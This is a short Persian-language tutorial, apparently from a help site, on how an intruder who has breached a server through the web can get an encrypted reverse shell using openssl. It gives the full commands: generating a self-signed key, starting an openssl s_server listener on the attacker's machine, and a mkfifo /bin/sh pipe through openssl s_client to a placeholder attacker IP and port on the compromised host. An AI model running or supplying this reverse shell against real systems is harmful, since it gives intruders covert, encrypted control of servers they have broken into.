یکی از دسترسی هایی که نفوذگر بعد از دسترسی به سرور از طریق وب یا … نیاز دارد ، دسترسی به Shell است .
بدین طریق میتوان از ابزار openssl که بر روی سرور های لینوکسی به طور پیشفرض نصب است استفاده کنید
پس ابتدا کلید را میسازیم :
root@kali# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
حال اقدام به Listen میکنیم ( روی ماشین نفوذگر ) :
openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>
در آخر از طریق سرور مقصد برای اتصال بصورت معکوس به ماشین اقدام میکنیم :
low-user@pwned#: mkfifo /tmp/s; /bin/sh
-i < /tmp/s 2>&1 | openssl s_client -quiet -connect
<ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s
این مقاله برای شما مفید بود؟
بلهخیر
